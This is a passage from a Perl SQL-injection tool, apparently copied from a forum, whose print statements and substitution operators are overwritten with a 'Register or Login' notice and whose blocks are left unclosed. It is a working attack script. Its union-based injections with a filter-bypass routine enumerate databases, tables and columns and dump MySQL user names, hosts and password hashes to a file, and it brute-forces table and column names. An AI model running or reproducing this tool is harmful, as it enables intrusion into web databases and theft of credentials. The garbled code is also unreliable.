$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);

if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

You are not allowed to view links. Register or Login "[Column $real] : $1\n";

savefile($save.".txt","[Column $real] : $1");

} else {

You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";

 

sub schemadb {

my ($page,$bypass,$save) = @_;

my $page1 = $page;

savefile($save.".txt","\n");

You are not allowed to view links. Register or Login "\n\n[+] Searching DBS\n\n";

($pass1,$pass2) = &bypass($bypass);

$page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code = toma($page.$pass1."from".$pass1."information_schema.schemata");

if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

my $limita = $1;

You are not allowed to view links. Register or Login "[+] Databases Length : $limita\n\n";

savefile($save.".txt","[+] Databases Length : $limita\n");

$page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;

$real = "1";

for my $limit(0..$limita) {

$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);

if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

my $control = $1;

if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {

You are not allowed to view links. Register or Login "[Database $real Found] $control\n";

savefile($save.".txt","[Database $real Found] : $control");

} else {

You are not allowed to view links. Register or Login "[-] information_schema = ERROR\n";

 

sub schematablesdb {

my $page = $_[0];

my $db = $_[2];

my $page1 = $page;

savefile($_[3].".txt","\n");

You are not allowed to view links. Register or Login "\n\n[+] Searching tables with DB $db\n\n";

($pass1,$pass2) = &bypass($_[1]);

savefile($_[3].".txt","[DB] : $db");

$page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;

$page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);

if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  

You are not allowed to view links. Register or Login "[+] Tables Length :  $1\n\n";

savefile($_[3].".txt","[+] Tables Length :  $1\n");

my $limit = $1;

$real = "1";

for my $lim(0..$limit) {

$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);

if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

my $table = $1;

You are not allowed to view links. Register or Login $table;

savefile($_[3].".txt","[Table $real Found : $table ]");

You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";

} else {

You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";

 

sub schemacolumnsdb {

my ($page,$bypass,$db,$table,$save) = @_;

my $page3 = $page;

my $page4 = $page;

You are not allowed to view links. Register or Login "\n\n[+] Searching columns in table $table with DB $db\n\n";

savefile($save.".txt","\n");

($pass1,$pass2) = &bypass($_[1]);

savefile($save.".txt","\n[DB] : $db");

savefile($save.".txt","[Table] : $table");

$page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);

if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

You are not allowed to view links. Register or Login "\n[Columns length : $1 ]\n\n";

savefile($save.".txt","[Columns length : $1 ]\n");

my $si = $1;

You are not allowed to view links. Register or Login $si;

$page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;

$real = "1";

for my $limit2(0..$si) {

$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);

if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

You are not allowed to view links. Register or Login "[Column $real] : $1\n";

savefile($save.".txt","[Column $real] : $1");

} else {

You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";

 

sub mysqluser {

my ($page,$bypass,$save) = @_;

my $cop = $page;

my $cop1 = $page;

savefile($save.".txt","\n");

You are not allowed to view links. Register or Login "\n\n[+] Finding mysql.users\n";

($pass1,$pass2) = &bypass($bypass);

$page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;

$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);

if ($code=~/RATSXPDOWN/ig){

$cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);

if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

You are not allowed to view links. Register or Login "\n\n[+] Users Found : $1\n\n";

savefile($save.".txt","\n[+] Users mysql Found : $1\n");

for my $limit(0..$1) {

$cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;

$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);

if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {

You are not allowed to view links. Register or Login "[Host] : $1 [User] : $2 [Password] : $3\n";

savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");

} else {

} else {

You are not allowed to view links. Register or Login "\n[-] mysql.user = ERROR\n";

 

sub tabfuzz {

my $page = $_[0];

($pass1,$pass2) = &bypass($_[1]);

$count = "0";

savefile($_[2].".txt","\n");

You are not allowed to view links. Register or Login "\n";

if ($_[0] =~/(.*)hackman(.*)/g) {

my $start = $1; my $end = $2;

You are not allowed to view links. Register or Login "\n\n[+] Searching tables.....\n\n";

for my $table(@buscar2) {

You are not allowed to view links. Register or Login $table;

$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";

$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;

$code = toma($injection);

if ($code =~/ERTOR854/g) {

$count++;

You are not allowed to view links. Register or Login "[Table Found] : $table\n";

savefile($_[2].".txt","[Table Found] : $table");

if ($count eq "0") { You are not allowed to view links. Register or Login "[-] Not found any table\n";

 

sub colfuzz {

my $page = $_[0];

($pass1,$pass2) = &bypass($_[1]);

$count = "0";

savefile($_[3].".txt","\n");

You are not allowed to view links. Register or Login "\n";

if ($_[0] =~/(.*)hackman(.*)/) {

my $start = $1; my $end = $2;

You are not allowed to view links. Register or Login "[+] Searching columns for the table $_[2]...\n\n";

savefile($_[3].".txt","[Table] : $_[2]");

for my $columns(@buscar1) {

You are not allowed to view links. Register or Login $columns;

$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";

$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);

if ($code =~/ERTOR854/g) {

You are not allowed to view links. Register or Login "[Column] : $columns\n";

savefile($_[3].".txt","[Column Found] : $columns");

} else {

You are not allowed to view links. Register or Login "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;

 

sub load {

savefile($_[2].".txt","\n");

You are not allowed to view links. Register or Login "\n";

($pass1,$pass2) = &bypass($_[1]);

if ($_[0] =~/(.*)hackman(.*)/g) {